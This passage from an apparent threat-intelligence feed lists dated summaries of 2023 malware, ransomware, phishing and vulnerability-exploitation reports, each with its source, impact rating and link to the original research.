Summary:: The numerous threat clusters that use fake browser update-related themes are being monitored by Proofpoint. False browser updates take advantage of consumers' confidence by using compromised websites and a bait that is specific to each user's browser to make the update appear legitimate and trick users into clicking.

Source: https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates

Intel Source:: Cloudflare

Intel Name:: Malicious_Impersonation_and_Data_Theft_attack_Targeting_RedAlert

Date of Scan:: 2023-10-17

Impact:: LOW

Summary:: Cloudflare's Cloudforce One Threat Operations Team discovered a malicious website impersonating the RedAlert - Rocket Alerts application, which provides crucial alerts about incoming airstrikes in Israel. This attack comes in the wake of recent cyber threats against rocket alert applications used in the region. The malicious website offered a fake Android version of the RedAlert app that, when downloaded, collected sensitive user data. We provide an analysis of the malicious APK's capabilities and the methods it uses to avoid detection.

Source: https://blog.cloudflare.com/malicious-redalert-rocket-alerts-application-targets-israeli-phone-calls-sms-and-user-information/

Intel Source:: QuickHeal

Intel Name:: Diving_Deep_into_MedusaLocker_Ransomware

Date of Scan:: 2023-10-17

Impact:: LOW

Summary:: Researchers at QuickHeal have examined and offered defense tactics against the ransomware known as MedusaLocker, which initially appeared in the middle of 2019. The hospital and healthcare sectors are its main targets. MedusaLocker encrypts the data of its victims using RSA and AES encryption methods.

Source: https://blogs.quickheal.com/medusalocker-ransomware-an-in-depth-technical-analysis-and-prevention-strategies/

Intel Source:: Trellix

Intel Name:: The_New_Frontier_of_Evasive_Attacks

Date of Scan:: 2023-10-17

Impact:: LOW

Summary:: Malicious actors have escalated the use of QR codes in phishing campaigns to bypass email security products. The blog delves into two distinct attack campaigns, each utilizing QR codes for evasion. Campaign 1 targets Microsoft Account holders, employing QR codes in email bodies to trick victims. Campaign 2 capitalizes on Chinese Government subsidy claims with QR codes embedded directly in emails.

Source: https://www.trellix.com/en-us/about/newsroom/stories/research/peeling-off-qr-code-phishing-onion.html

Intel Source:: SentinelOne

Intel Name:: Examining_In_Depth_Dark_Angels_Ransomware

Date of Scan:: 2023-10-17

Impact:: LOW

Summary:: Researchers from SentinelOne have provided technical information about the Dark Angels ransomware, compared samples of RagnarLocker and Dark Angels, and offered advice for security teams protecting ESXi servers.

Source: https://www.sentinelone.com/blog/dark-angels-esxi-ransomware-borrows-code-victimology-from-ragnarlocker/

Intel Source:: Wordfence

Intel Name:: Critical_Unauthenticated_Arbitrary_File_Upload_Vulnerability

Date of Scan:: 2023-10-17

Impact:: LOW

Summary:: The Royal Elementor Addons and Templates WordPress plugin is used by over 200,000 websites. The Wordfence Threat Intelligence Team discovered a vulnerability in the plugin that was recently patched, allowing unauthenticated attackers to upload any file to a compromised website.

Source: https://www.wordfence.com/blog/2023/10/psa-critical-unauthenticated-arbitrary-file-upload-vulnerability-in-royal-elementor-addons-and-templates-being-actively-exploited/

Intel Source:: ISC.SANS

Intel Name:: Domain_Name_Recorded_by_DShield_Sensor_as_Password

Date of Scan:: 2023-10-16

Impact:: LOW

Summary:: SANS researchers have discovered something unusual in the list of the Top Usernames and Passwords—multiple domain names were used as passwords—for the first time. At first, They thought there might have been a mistake in Logstash's processing, so they looked over the raw logs to make sure everything was processed correctly and ensure data integrity.

Source: https://isc.sans.edu/diary/Domain+Name+Used+as+Password+Captured+by+DShield+Sensor/30312/

Intel Source:: CISA

Intel Name:: Exploit_of_Atlassian_Confluence_CVE_2023_22515

Date of Scan:: 2023-10-16

Impact:: HIGH

Summary:: Today, CISA, FBI, and MS-ISAC shared their Cybersecurity Advisory about the active exploitation of CVE-2023-22515. This vulnerability affects some versiovs of Atlassian Confluence Data Center and Server and letting threat actors to get initial access to Confluence instances by creating unauthorized Confluence administrator accounts. This vulnerability was exploited as zero-day to obtain access to victim systems and continue their active exploitation. It was rated as critical vulnerability and agencies suggest that it is widespread, continued exploitation due to ease of exploitation.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-289a

Intel Source:: Cofense

Intel Name:: Voice_Message_Phishing_Campaigns_Access_Key

Date of Scan:: 2023-10-16

Impact:: LOW

Summary:: Researchers at Cofense have seen a phishing effort in which the attackers used an access key in the body of the message to lure the victim into listening to the voicemail that had been left for them to review.

Source: https://cofense.com/blog/access-key-used-in-voice-messaged-phishing/

Intel Source:: Guard Labs

Intel Name:: EtherHiding_Malware_Campaign_Takes_Advantage_of_Binances_Smart_Chain

Date of Scan:: 2023-10-16

Impact:: LOW

Summary:: Using Binance's Smart Chain (BSC) contracts, threat actors have been seen delivering malicious malware in what has been called the "next level of bulletproof hosting." Guardio Labs has given the campaign, which was discovered two months ago, the name of EtherHiding.

Source: https://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16

Intel Source:: CERT-UA

Intel Name:: Ukrainian_Providers_Are_Target_of_Destructive_Cyberattacks

Date of Scan:: 2023-10-16

Impact:: LOW

Summary:: Public sources state that between May 11, 2023, and September 27, 2023, an organized group of attackers—followed by the identifier UAC-0165—interferred with the information and communication systems (ICS) of no fewer than 11 Ukrainian telecommunications providers. This interfered with the provision of services to customers, among other things.

Source: https://cert.gov.ua/article/6123309

Intel Source:: Cyble

Intel Name:: AgentTesla_attacks_via_CHM_and_PDF_Files

Date of Scan:: 2023-10-13

Impact:: LOW

Summary:: In recent attack campaign, Cyble researchers discovered a CHM file that has been compressed using Gzip and probably delivered using malicious spam email. The maliciousd CHM file acts as a trap. It is targeting individuals or entities linked in network engineering, telecommunications, or information technology based on the content available in the CHM file.

Source: https://cyble.com/blog/agenttesla-spreads-through-chm-and-pdf-files-in-recent-attacks/

Intel Source:: Phylum

Intel Name:: Malicious_NuGet_Package_Using_SeroXen_RAT_to_Target_DotNET_Developers

Date of Scan:: 2023-10-13

Impact:: LOW

Summary:: Researchers from Phylum have identified that a malicious package hosted on the.NET Framework's NuGet package manager has the ability to distribute the remote access trojan SeroXen RAT.

Source: https://blog.phylum.io/phylum-discovers-seroxen-rat-in-typosquatted-nuget-package/

Intel Source:: Trend Micro

Intel Name:: DarkGate_Allows_Attacks_Using_Teams_and_Skype

Date of Scan:: 2023-10-13

Impact:: MEDIUM

Summary:: Researchers from Trend Micro have been keeping an eye on a campaign that exploits Teams and Skype to spread the DarkGate malware to certain companies. They also found that additional payloads were delivered into the environment once DarkGate was installed on the victim's system.

Source: https://www.trendmicro.com/en_us/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html

Intel Source:: Trend Micro

Intel Name:: Void_Rabisu_Targeting_Female_Political_Leaders

Date of Scan:: 2023-10-13

Impact:: LOW

Summary:: Researchers at Trend Micro have found that Void Rabisu is still working on its primary piece of malware, the ROMCOM backdoor, nearly a year after shifting its focus from opportunistic attacks with ransomware to cyberespionage.

Source: https://www.trendmicro.com/en_us/research/23/j/void-rabisu-targets-female-leaders-with-new-romcom-variant.html

Intel Source:: ASEC

Intel Name:: Volgmer_and_Scout_Malware_Analysis_Report_from_Lazarus_Threat_Group

Date of Scan:: 2023-10-13

Impact:: LOW

Summary:: ASEC researchers have examined the first discovered version of the Volgmer backdoor as well as the subsequent version that started to be used in attacks in 2017. Next, we will examine the Scout downloader and discuss the dropper that was utilized for the Scout installation.

Source: https://asec.ahnlab.com/en/57685/

Intel Source:: Securelist

Intel Name:: ToddyCat_an_advanced_APT_actor

Date of Scan:: 2023-10-12

Impact:: LOW

Summary:: ToddyCat started their malicious activity back in 2020. This group is very advanced APT group. And responsible for attacks against high-profile organizations in Europe and Asia. Securelist researchers in their blog explaining the group's new toolset, the malware used to steal and exfiltrate data, and the techniques used by this group to move laterally and conduct espionage operations.

Source: https://securelist.com/toddycat-keep-calm-and-check-logs/110696/

Intel Source:: Checkmarx

Intel Name:: Latest_supply_chain_attack

Date of Scan:: 2023-10-12

Impact:: LOW

Summary:: Last month, a "kohlersbtuh15" threat actor tried to hack to the open-source community by uploading a series of malicious packages to the PyPi package manager. It appeared that the attacker targeted developers for Aliyun services (Alibaba Cloud), telegram, and AWS.

Source: https://checkmarx.com/blog/users-of-telegram-aws-and-alibaba-cloud-targeted-in-latest-supply-chain-attack/ https://blog.phylum.io/cloud-provider-credentials-targeted-in-new-pypi-malware-campaign/

Intel Source:: Checkpoint

Intel Name:: STAYIN_ALIVE_Targeting_Government_Ministries_and_Telecoms_in_Asia

Date of Scan:: 2023-10-12

Impact:: MEDIUM

Summary:: "Stayin' Alive" is a campaign that Check Point Research continues to be monitoring since at least 2021. The campaign is active in Asia and mainly targeting government agencies and the telecom sector. The majority of the "Stayin' Alive" campaign is made up of downloaders and loaders, some of which are employed as first-stage infection vectors against well-known Asian companies.

Source: https://research.checkpoint.com/2023/stayin-alive-targeted-attacks-against-telecoms-and-government-ministries-in-asia/

Intel Source:: ASEC

Intel Name:: Hexadecimal_Notation_Addresses_Install_ShellBot_DDoS_Malware

Date of Scan:: 2023-10-12

Impact:: MEDIUM

Summary:: ASEC researchers have found that the ShellBot malware, which is being deployed on poorly maintained Linux SSH servers, has a different way of spreading. The threat actor now uses a hexadecimal value instead of a standard IP address as the download URL to install ShellBot, but the general procedure is still the same.

Source: https://asec.ahnlab.com/en/57635/

Intel Source:: CISA

Intel Name:: AvosLocker_Ransomware_Update

Date of Scan:: 2023-10-11

Impact:: HIGH

Summary:: FBI and CISA released today an update on AvosLocker Advisory to distribute known indicators of compromise, tactics, techniques, and procedures (TTPs), and detection methods associated with the AvosLocker variant identified through FBI investigations as recently as May 2023.

Source: https://www.cisa.gov/sites/default/files/2023-10/aa23-284a-joint-csa-stopransomware-avoslocker-ransomware-update.pdf

Intel Source:: Cyble

Intel Name:: The_deployment_of_Mythic_Athena_Agent

Date of Scan:: 2023-10-11

Impact:: LOW

Summary:: Cyble researchers recently observed a new spear phishing email targeting a leading Russian semiconductor supplier. The hackers were taking advantage of a Remote Code Execution (RCE) vulnerability, identified as CVE-2023-38831, to deliver their payload on compromised systems.

Source: https://cyble.com/blog/threat-actor-deploys-mythics-athena-agent-to-target-russian-semiconductor-suppliers/

Intel Source:: Krebson Security

Intel Name:: The_phishing_scams_targeting_U_S_Postal_Service_customers

Date of Scan:: 2023-10-11

Impact:: LOW

Summary:: Recently it was seen a rise of the phishing scams targeting U.S. Postal Service customers. Krebson Security analysts made a conclusion that there are an extensive SMS phishing operation that tries to steal personal and financial data by spoofing the USPS, as well as postal services in at least a dozen other countries.

Source: https://krebsonsecurity.com/2023/10/phishers-spoof-usps-12-other-natl-postal-services/

Intel Source:: ASEC

Intel Name:: Distributing_Infostealer_with_Abnormal_Certificate

Date of Scan:: 2023-10-11

Impact:: LOW

Summary:: Malware employing strange certificates has been spreading at a rapid rate lately. Malware frequently assumes the appearance of legitimate certificates. However, in this instance, the virus inserted the certificate information at random, leaving unusually long strings in the Subject Name and Issuer Name sections.

Source: https://asec.ahnlab.com/en/57553/

Intel Source:: Ciberdefensa

Intel Name:: The_distribution_of_new_spotted_AgentTesla_Infostealer

Date of Scan:: 2023-10-11

Impact:: LOW

Summary:: ASEC has discovered the AgentTesla Infostealer that was distributed through an email in the form of a malicious BAT file.

Source: https://ciberdefensa.cat/archivos/26103

Intel Source:: AT&T

Intel Name:: An_increase_usage_of_phishing_emails_containing_malicious_QR

Date of Scan:: 2023-10-11

Impact:: LOW

Summary:: Last couple months, AT&T SOC analysts observed an increase in the usage of phishing emails containing malicious QR codes. One of customer as example was victimized by a phishing attempt provided the AT&T analysts with an email that was circulated to several of its internal users.

Source: https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-quishing-combatting-embedded-malicious-qr-codes

Intel Source:: Symantec

Intel Name:: An_Unknown_Threat_Actor_Targeting_Several_Taiwanese_Organizations

Date of Scan:: 2023-10-10

Impact:: LOW

Summary:: Targeting businesses in Taiwan's manufacturing, IT, and biomedical industries, a previously unidentified advanced persistent threat (APT) group employed proprietary malware and other openly accessible tools. Organizations in Vietnam, the United States, and the Pacific Islands government agency all seem to have been targeted as part of this operation. Up until at least May 2023, this activity was ongoing and started in February 2023.

Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/grayling-taiwan-cyber-attacks

Intel Name:: Targets_on_unpatched_tagDiv_plugin

Date of Scan:: 2023-10-10

Impact:: LOW

Summary:: Sucuri researchers team observed new waves of Balada malware injections on websites that were actively using tagDiv themes. Sucuri shared their examantion of these waves of ongoing massive Balada Injector campaign. Additionally they provided the technical details of the injected scripts found in each wave, exploring their functionality and the potential dangers they pose to site administrators.

Source: https://blog.sucuri.net/2023/10/balada-injector-targets-unpatched-tagdiv-plugin-newspaper-theme-wordpress-admins.html

Intel Source:: Fortinet

Intel Name:: RCE_Campaign_Hacks_Routers_Into_Botnets

Date of Scan:: 2023-10-10

Impact:: LOW

Summary:: A campaign called IZ1H9 has intensified the development of malware to target a variety of unpatched routers and IoT devices and add them to a growing botnet used to perform targeting DDoS cyberattacks. FortiGuard Labs researchers have discovered the campaign, which recently added 13 new payloads that took advantage of vulnerabilities in Yealink Device Management, Zyxel devices, TP-Link Artcher, Korenix Jetwave, and Totolink routers as well as known vulnerabilities in D-Link devices, Netis wireless routers, Sunhillo SureLine, and Geutebruck IP cameras.

Source: https://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsenal-with-scores-of-exploits

Intel Source:: Akamai

Intel Name:: New_Magecart_Campaign_Exploits_404_Pages

Date of Scan:: 2023-10-10

Impact:: LOW

Summary:: Large companies in the food and retail industries are among the many websites that a Magecart web skimming campaign is targeting, according to the Akamai Security Intelligence Group. This campaign distinguishes out due to its three sophisticated concealment strategies, one of which we had never seen before and which presents particular difficulties for identification and mitigation (particularly, changing the website's normal 404 error page to disguise harmful code).

Source: https://www.akamai.com/blog/security-research/magecart-new-technique-404-pages-skimmer

Intel Source:: ASEC

Intel Name:: Infostealer_Distributing_via_Spam_Email

Date of Scan:: 2023-10-10

Impact:: LOW

Summary:: ASEC researchers have spotted the AgentTesla Infostealer distributing via an email in the form of a malicious BAT file. When the BAT file is executed, it employs the fileless method to run AgentTesla (EXE) without creating the file on the user’s PC. This blog post will provide an explanation of the distribution process, from the spam email to the final binary (AgentTesla), along with related techniques.

Source: https://asec.ahnlab.com/en/57546/

Intel Source:: CERT-UA

Intel Name:: UAC_0006_Group_Using_SmokeLoader_Malware

Date of Scan:: 2023-10-09

Impact:: MEDIUM

Summary:: CERT-UA researchers have identified at least four waves of cyberattacks carried out by the UAC-0006 group using the SmokeLoader malware. Legitimate compromised email addresses are used to send emails, and SmokeLoader is delivering to computers in several way.

Source: https://cert.gov.ua/article/6032734

Intel Source:: https://any.run/cybersecurity-blog/analyzing-snake-keylogger/

Intel Name:: Examining_the_Snake_Keylogger

Date of Scan:: 2023-10-09

Impact:: LOW

Summary:: Researchers from AnyRun have examined the Snake Keylogger. It is malware that steals information and was created in the.NET programming language. It was identified in November 2020 and goes by the names Snake, 404 Keylogger, and 404KeyLogger. The Snake Keylogger collects the victim's saved passwords, clipboard contents, keystrokes, and screen shots, among other pieces of information.

Source: https://any.run/cybersecurity-blog/analyzing-snake-keylogger/

Intel Source:: IBM Security Intelligence

Intel Name:: Harvesting_of_Credentials_For_NetScaler_Gateway

Date of Scan:: 2023-10-09

Impact:: LOW

Summary:: Attackers were using the CVE-2023-3519 vulnerability to target unpatched NetScaler Gateways in September 2023 and inject a malicious script into the HTML code of the authentication web page in order to capture user credentials. The effort is yet another illustration of how cybercriminals' interest in credentials has grown. According to the 2023 X-Force cloud threat report, stolen credentials were used in 67% of cloud-related incident response engagements.

Source: https://securityintelligence.com/posts/x-force-uncovers-global-netscaler-gateway-credential-harvesting-campaign/

Intel Source:: Cyble

Intel Name:: The_exploit_of_a_vulnerability_in_WinRAR

Date of Scan:: 2023-10-07

Impact:: LOW

Summary:: Cyble researchers observed a RAR archive file on October 3rd on VirusTotal. That file exploits a WinRAR vulnerability (CVE-2023-38831) that could be discovered through adult websites or fake adult sites. In this malware campaign, this vulnerability is targeting to deliver various malicious payloads to the victim’s system and aiming to infect them using various malware types, such as Apanyan Stealer, The Murk-Stealer, and AsyncRAT.

Source: https://cyble.com/blog/winrar-vulnerability-puts-illicit-content-consumers-at-risk-of-apanyan-stealer-murk-stealer-asyncrat/

Intel Source:: SOC Radar

Intel Name:: Diving_Deep_into_Dark_Pink_APT_Group

Date of Scan:: 2023-10-06

Impact:: LOW

Summary:: SOCRader researchers have delved into the intricate details of the Dark Pink APT Group, shedding light on their campaigns, targets, and the security measures one can adopt to safeguard against malicious endeavors.

Source: https://socradar.io/apt-profile-dark-pink-apt-group/

Intel Source:: Nsfocus

Intel Name:: New_wave_of_Mirai_Botnet

Date of Scan:: 2023-10-06

Impact:: MEDIUM

Summary:: NSFOCUS threat hunting system observed a new botnet variant families tied to Mirai. These families are hailBot, kiraiBot and catDDoS and very active and already spreaded widely that is becoming as a threat. Through this article, we will disclose the technical details of these three new Mirai variants and the data monitored by the global threat hunting system.

Source: https://nsfocusglobal.com/mirai-botnets-new-wave-hailbot-kiraibot-catddos-and-their-fierce-onslaught/?web_view=true

Intel Source:: eSentire

Intel Name:: Examining_Uses_of_ProjFUD_Injector_and_HTML_Smuggling_to_Deploy_AsyncRAT

Date of Scan:: 2023-10-06

Impact:: LOW

Summary:: Researchers from eSentire have determined that the questioned VBS file is malicious. The code to retrieve AsyncRAT is located in this file. The user got a phishing email with an.htm file attached. This method, known as HTML smuggling, was previously used by malware strains including Qakbot and AsyncRAT.

Source: https://www.esentire.com/blog/investigating-asyncrat-deployment-via-projfud-injector-and-html-smuggling

Intel Source:: eSentire

Intel Name:: Attacks_Involving_an_Adversary_in_the_Middle_Have_Increased

Date of Scan:: 2023-10-06

Impact:: LOW

Summary:: Researchers from eSentire have noticed an uptick in adversary-in-the-middle (AitM) phishing attacks since mid-September 2023. AitM phishing attacks use social engineering to trick end users into clicking on dangerous links in emails. Then, data is proxied or routed through infrastructure under the control of the attacker, which results in the theft of user credentials, including session cookies and Multi-Factor Authentication (MFA) codes that would allow access to various accounts. This access has been used to carry out Business Email Compromise (BEC) attacks.

Source: https://www.esentire.com/security-advisories/increase-in-adversary-in-the-middle-phishing-attacks

Intel Source:: Sentinelone

Intel Name:: Analysis_of_LostTrust_Ransomware

Date of Scan:: 2023-10-06

Impact:: LOW

Summary:: The ransomwares have been examined by SentinelOne experts, who have provided a high-level technical breakdown of the areas where various ransomware families and their modes of operation coincide. In addition to analyzing LostTrust payload behavior, they contrast artifacts with those from the SFile and Mindware families.

Source: https://www.sentinelone.com/blog/losttrust-ransomware-latest-multi-extortion-threat-shares-traits-with-sfile-and-mindware/

Intel Source:: ReversingLabs

Intel Name:: A_Typosquatting_Operation_Using_NPM_to_Distribute_r77_Rootkit

Date of Scan:: 2023-10-05

Impact:: LOW

Summary:: Researchers from ReversingLabs have discovered a fresh supply chain exploit that targets the npm platform. The "typosquatting" campaign first surfaced in August, pushing a malicious package called node-hide-console-windows that downloaded a Discord bot that made it easier to install the r77 open source rootkit.

Source: https://www.reversinglabs.com/blog/r77-rootkit-typosquatting-npm-threat-research

Intel Source:: Talos

Intel Name:: The_distribute_of_Ransom_Knight_malware_by_Qakbot_actors

Date of Scan:: 2023-10-05

Impact:: MEDIUM

Summary:: Talos is confident that even the FBI seized Qakbot infrastructure down in August that the threat actors behind Qakbot are active and started a new campaign that was activated just before the takedown, distributing a variant of Cyclops/Ransom Knight ransomware along with the Remcos backdoor. Talos observedd this new activity by connecting the metadata in the LNK files used in the new campaign to the machines used in previous Qakbot campaigns.

Source: https://blog.talosintelligence.com/qakbot-affiliated-actors-distribute-ransom/

Intel Source:: Trend Micro

Intel Name:: Exposing_Infection_Methods_Across_Supply_Chains_and_Codebases

Date of Scan:: 2023-10-05

Impact:: LOW

Summary:: Researchers from Trend Micro examined case studies in which threat actors copied legitimate GitHub repositories (such as Binance-trading-bot, Crypto-clipper, Telegram-mass-dm, USDT-Sweeper, Discord-boost-tool, and others written in Python 3), trojanized them, and infected them with malicious code while strategically stuffing their repository description sections with keywords to increase their visibility in GitHub searches.

Source: https://www.trendmicro.com/en_us/research/23/j/infection-techniques-across-supply-chains-and-codebases.html

Intel Source:: welivesecurity

Intel Name:: DinodasRAT_Hits_a_Governmental_Organization_in_Guyana

Date of Scan:: 2023-10-05

Impact:: MEDIUM

Summary:: As part of Operation Jacana, a cyber espionage operation, a government agency in Guyana has been attacked. The activity involved a spear-phishing attack that resulted in the deployment of a previously undocumented implant named DinodasRAT, which was built in C++. ESET discovered the activity in February 2023.

Source: https://www.welivesecurity.com/en/eset-research/operation-jacana-spying-guyana-entity/

Intel Source:: Eclecticiq

Intel Name:: A_cyber_espionage_campaign_with_use_of_a_variant_of_HyperBro_loader

Date of Scan:: 2023-10-05

Impact:: LOW

Summary:: EclecticIQ analysts detected a cyber espionage campaign. The threat actors used a HyperBro loader variant with a Taiwan Semiconductor Manufacturing (TSMC) coax. It targeted the semiconductor industry in Mandarin/Chinese speaking East Asian regions (Taiwan, Hong Kong, Singapore).

Source: https://blog.eclecticiq.com/chinese-state-sponsored-cyber-espionage-activity-targeting-semiconductor-industry-in-east-asia

Intel Source:: Domain Tools

Intel Name:: US_Postal_Service_Smishing_Campaign_analysis

Date of Scan:: 2023-10-04

Impact:: LOW

Summary:: Recently, there was an observation of a spike of phishing, smishing emails and text messages in campaigns targeting the US Postal Service (USPS) as an institution,

Source: https://www.domaintools.com/resources/blog/return-to-sender-a-brief-analysis-of-a-us-postal-service-smishing-campaign/

Intel Source:: Cyble

Intel Name:: RMS_Phishing_campaign_comeback

Date of Scan:: 2023-10-04

Impact:: LOW

Summary:: Cyble Research team discovered a phishing campaign targeted at Russian users, where TAs formed phishing websites that duplicated popular apps like ExpressVPN, WeChat, and Skype. All these applications are not accessible in Russia due to nationwide restrictions.

Source: https://cyble.com/blog/rms-tools-sneaky-comeback-phishing-campaign-mirroring-banned-applications/

Intel Source:: Menlo Security

Intel Name:: EvilProxy_Phishing_Attack_Strikes_Indeed

Date of Scan:: 2023-10-04

Impact:: LOW

Summary:: Menlo Labs have discovered a phishing campaign that targets senior-level executives in a variety of businesses, but especially those in the banking and financial services, insurance, property management, and manufacturing sectors.

Source: https://www.menlosecurity.com/blog/evilproxy-phishing-attack-strikes-indeed/

Intel Source:: Checkmarx

Intel Name:: The_Emergence_of_Recurring_Python_Threat

Date of Scan:: 2023-10-04

Impact:: LOW

Summary:: Researchers from Checkmarx have seen that from the beginning of April 2023, an attacker has been continuously deploying hundreds of malicious packages under different usernames, racking up close to 75,000 downloads. With changes from plain-text to encryption, multilevel obfuscation, and secondary disassembly payloads, the attacker's progression is clear.

Source: https://checkmarx.com/blog/the-evolutionary-tale-of-a-persistent-python-threat/

Intel Source:: Rapid7

Intel Name:: WS_FTP_Server_critical_vulnerabilities_in_the_wild

Date of Scan:: 2023-10-03

Impact:: MEDIUM

Summary:: First spotted two critical vulnerabilities was by Progress Software who published their advisory about it. Two of which are critical (CVE-2023-40044 and CVE-2023-42657). appears to be the .NET deserialization vulnerability (CVE-2023-40044) and confirmed that it is exploitable with a single HTTPS POST request and a pre-existing ysoserial.net gadget. As of September 30, Rapid7 has observed multiple instances of WS_FTP exploitation in the wild. and provided the details of this activity in the Observed Attacker Behavior section of their blog.

Source: https://www.rapid7.com/blog/post/2023/09/29/etr-critical-vulnerabilities-in-ws_ftp-server/

Intel Source:: Fortinet

Intel Name:: A_discovery_of_several_malicious_packages_hidden_in_NPM

Date of Scan:: 2023-10-03

Impact:: MEDIUM

Summary:: Last couple months, the Fortinet team discovered several malicious packages hidden in NPM. These packages were discovered through various ecosystems e.g. PyPI, NPM. In this blog, we will look at some of these packages, grouping them based on similar styles of code or functions. Every NPM package that was discovered targets to steal sensitive data, such as system or user information, via a webhook or file-sharing link.

Source: https://www.fortinet.com/blog/threat-research/malicious-packages-hiddin-in-npm

Intel Source:: Cyble

Intel Name:: PurpleFox_campaign_resurfaces_again

Date of Scan:: 2023-10-02

Impact:: LOW

Summary:: Cyble Research and Intelligence Labs (CRIL) came across a Word document file that spreads via spam email, employing an infection method for disseminating PurpleFox malware.

Source: https://cyble.com/blog/purplefox-resurfaces-via-spam-emails-a-look-into-its-recent-campaign/

Intel Source:: Cyfirma

Intel Name:: The_Murk_Stealer_an_open_source_stealer_details

Date of Scan:: 2023-10-02

Impact:: LOW

Summary:: Cyfirma shared a full analysis report of “The-Murk-Stealer;” an open-source stealer. Their report shows the details of “The-Murk-Stealer,” a malicious tool that can discreetly infiltrate systems to collect sensitive information.

Source: https://www.cyfirma.com/outofband/the-thin-line-educational-tools-vs-malicious-threats-a-focus-on-the-murk-stealer/

Intel Source:: Zscaler

Intel Name:: A_new_Malware_threat_BunnyLoader

Date of Scan:: 2023-10-02

Impact:: LOW

Summary:: Zscaler threat reserachers observed a new Malware-as-a-Service “BunnyLoader”. It has been sold on various forums. BunnyLoader has many capabilities like downloading and executing a second-stage payload, stealing browser credentials and system information, and much more.

Source: https://www.zscaler.com/blogs/security-research/bunnyloader-newest-malware-service

Intel Source:: PaloAlto

Intel Name:: The_CL0P_ransomware_group_recent_activity

Date of Scan:: 2023-09-30

Impact:: MEDIUM

Summary:: https://unit42.paloaltonetworks.com/cl0p-group-distributes-ransomware-data-with-torrents/

Source: https://unit42.paloaltonetworks.com/cl0p-group-distributes-ransomware-data-with-torrents/

Intel Source:: Malwarebytes

Intel Name:: Ad_Serving_Malicious_Content_Inside_Bing_AI_Chatbot

Date of Scan:: 2023-09-29

Impact:: LOW

Summary:: Researchers from Malwarebytes have discovered a method through which consumers looking for software downloads can be persuaded to visit fraudulent websites and download malware straight from a Bing Chat chat.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2023/09/malicious-ad-served-inside-bing-ai-chatbot

Intel Source:: Trend Micro

Intel Name:: APT34_Launches_Phishing_Attack_With_New_Malware

Date of Scan:: 2023-09-29

Impact:: MEDIUM

Summary:: Researchers from TrendMicro have detected and tracked the advanced persistent threat (APT) APT34 group with a new malware version that is used in conjunction with a phishing scam that was comparable to the SideTwist backdoor virus. Following the campaign, the organization went after a victim in Saudi Arabia using a bogus license registration form created by an African government agency.

Source: https://www.trendmicro.com/en_us/research/23/i/apt34-deploys-phishing-attack-with-new-malware.html

Intel Source:: Huntress

Intel Name:: Analyses_of_Netscaler_exploitation

Date of Scan:: 2023-09-29

Impact:: LOW

Summary:: Huntress duty on the daily basis is to perform a periodic threat hunting across monitored endpoints for a suspicious activity not previously identified through existing detections. Recently while monitoring their activity, Huntress researchers observed the starnge processes in several monitored environments. It reflected the reconnaissance activities with the adversary tradecraft: executing built-in commands such as whoami.exe, tasklist with various flags, ipconfig, and ping.

Source: https://www.huntress.com/blog/netscaler-exploitation-to-social-engineering-mapping-convergence-of-adversary-tradecraft-across-victims

Intel Source:: ISC. SANS

Intel Name:: Sample_of_Infostealer_malware_that_is_in_the_wild

Date of Scan:: 2023-09-29

Impact:: LOW

Summary:: ISC.SANS researcher spotted and analyzed a new "Infostealer" malware in the wild. He is concerned how people are still Storing Passwords and if it is still In Plain Text files..

Source: https://isc.sans.edu/diary/rss/30262

Intel Source:: Securelist

Intel Name:: Reports_on_new_malwares_and_loaders

Date of Scan:: 2023-09-29

Impact:: LOW

Summary:: Securelist published their report on new ASMCrypt malware (related to the DoubleFinger loader) and also published reports on new versions of the Lumma stealer and Zanubis Android banking trojan.

Source: https://securelist.com/crimeware-report-asmcrypt-loader-lumma-stealer-zanubis-banker/110512/

Intel Source:: Welivesecurity

Intel Name:: Analyzes_of_a_Lazarus_attack_on_employees_of_an_aerospace_company

Date of Scan:: 2023-09-29

Impact:: LOW

Summary:: ESET researchers have observed a Lazarus attack on an aerospace company in Spain and initiated several tools, most notably a publicly undocumented backdoor we named LightlessCan.

Source: https://www.welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/

Intel Source:: Security Affairs

Intel Name:: Johnson_Controls_International_suffered_a_ransomware_attack

Date of Scan:: 2023-09-29

Impact:: MEDIUM

Summary:: Johnson Controls International had announced that they had a massive ransomware attack that encrypted many of the company devices, including VMware ESXi servers, impacting the company’s and its subsidiaries’ operations.

Source: https://securityaffairs.com/151636/cyber-crime/dark-angels-team-ransomware-group-hit-johnson-controls.html

Intel Source:: Checkmarx

Intel Name:: Dependabot_carrying_malicious_code

Date of Scan:: 2023-09-28

Impact:: LOW

Summary:: Checkmarx recently observed that their scanners detected nontypical commits to hundreds of GitHub repositories and carrying malicious code. Those commit messages were made up by threat actors to appear as a Dependabot automated contribution in the commit history, an attempt to disguise the malicious activity.

Source: https://checkmarx.com/blog/surprise-when-dependabot-contributes-malicious-code/

Intel Source:: Cyber Geeks

Intel Name:: Diving_Deep_into_Brute_Ratel_C4_Payloads

Date of Scan:: 2023-09-28

Impact:: LOW

Summary:: An alternative to Cobalt Strike is the Red Team & Adversary Simulation program Brute Ratel C4. A technical investigation of a Brute Ratel badger/agent that doesn't use all the most recent aspects of the framework has been presented by researchers.

Source: https://cybergeeks.tech/a-deep-dive-into-brute-ratel-c4-payloads-part-2/

Intel Source:: Fortinet

Intel Name:: A_Spearphishing_Campaign_Exploits_the_Azerbaijan_Armenia_Conflict

Date of Scan:: 2023-09-28

Impact:: LOW

Summary:: Last month, FortiGuard Labs has spotted a malicious memo pretending it is from the president of a company in Azerbaijan and targeted the management teams of associated businesses. After clicking on this memo, it downloaded malware which meant to collect basic information from its targets. The memo is in HTML format and uses HTML smuggling to automatically deliver a password-protected archive.

Source: https://www.fortinet.com/blog/threat-research/threat-Actors-exploit-the-tensions-between-azerbaijan-and-armenia

Intel Source:: Symantec

Intel Name:: Budworm_APT_Group_Attacks_Government_and_Telecoms_Organizations

Date of Scan:: 2023-09-28

Impact:: MEDIUM

